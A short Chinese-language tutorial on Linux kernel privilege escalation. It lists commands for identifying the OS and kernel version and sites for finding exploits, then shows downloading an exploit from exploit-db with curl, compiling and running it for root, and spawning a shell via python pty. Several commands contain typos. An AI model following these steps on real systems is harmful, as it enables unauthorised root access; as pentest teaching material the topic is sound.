Linux 内核提权
步骤:
1、获取操作系统版本号
2、根据版本号搜索exp
3、反弹shell
4、尝试利用
获取操作系统版本号
- 获取发行版本
– cat /etc/issue
– cat /etc/-release
– cat /etc/lsb-release
– cat /etc/redhat-release
2. 获取内核版本
– cat /proc/ version
– uname – a
– uname -mrs
– rpm -q kernel
– dmesg | grepLinux
– ls/boot | grepvmlinuz
– apt list kernel
搜索exp
- http://www.exploit-db.com
- http://1337day.com
- http://www.securiteam.com
- http://www.securityfocus.com
- http://www.exploitsearch.net
- http://metasploit.com/modules/
- http://securityreason.com
- http://seclists.org/fulldisclosure/
- http://www.google.com
反弹shell
获取exp
eg(举例说明,具体exp去上面网址搜索):
curl https://www.exploit-db.com/download/ 35370> exp.c
gcc编译一下 exp.c 生成exp
gcc exp.c -o exp -lpthread
./exp #执行exp获取root
#利用python返回交互式shell
python -c ’import pty; pty.spawn(”/bin/bash“)‘
